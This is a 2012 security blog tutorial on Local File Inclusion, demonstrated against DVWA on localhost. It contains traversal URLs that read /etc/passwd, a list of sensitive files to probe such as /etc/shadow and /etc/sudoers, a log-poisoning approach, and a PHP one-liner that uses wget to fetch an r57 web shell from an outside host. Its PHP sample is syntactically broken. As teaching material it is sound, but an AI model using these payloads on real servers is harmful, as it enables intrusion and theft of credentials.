Pages

Saturday, March 03, 2012

Local File Inclusion 101

Local File Inclusion or LFI is a kind of exploit or vulnerability that allows an attacker to inject directory traversal characters on a certain website. This happens when a page include is not sanitized, here is a sample code from Damn Web Vulnerable Application:


<?php

     $file $_GET['page']; //The page we wish to display 

?>


Here is the sample link of the vulnerable path : http://127.0.0.1/vulnerabilities/fi/?page=include.php

file inclusion

Now, let us try to do a directory traversal to the passwd file of the web server:

http://127.0.0.1/vulnerabilities/fi/?page=/etc/passwd


In most cases, you just need to add some few ../ before the /etc/passwd:

http://127.0.0.1/vulnerabilities/fi/?page=../etc/passwd


http://127.0.0.1/vulnerabilities/fi/?page=../../etc/passwd

http://127.0.0.1/vulnerabilities/fi/?page=../../../etc/passwd  

So on and so forth until you see the image above. This is very dangerous especially if it's a Linux server because the passwd file shows the the hashes of the passwords on the server which could be possibly cracked in order to gain access on the server.

You can also visit other directories which can be used for information gathering and maybe we can see some luck in probing the web server:

/etc/environment
/etc/shadow
/etc/sudoers
/etc/group
/etc/resolv.conf
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
/var/log/messages
var/log/mysql.log
/var/log/user.log
/var/www/logs/error_log


There are many ways to exploit a web server, an attacker could inject a PHP code or a backdoor into the HTTPD logs, and access them via LFI again:
/var/log/apache/error_log
/apache/logs/access.log
var/log/error.log

/* and many more */

Other people may also use a Firefox add-on User-Agent switcher  and spawn a shell:

<?exec('wget http://www.localroot.ph/r57.txt -O backdoor.php');?>

Some admins may do some filter evasion to prevent common attacks of LFI, so what we are going to do is to encode one or more characters into hexadecimal because the browser decodes the input but the PHP does not. Example input:

http://127.0.0.1/vulnerabilities/fi/?page=%2Fvar%2Flog%2Fmessages
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fresolv.conf
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fpasswd

About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.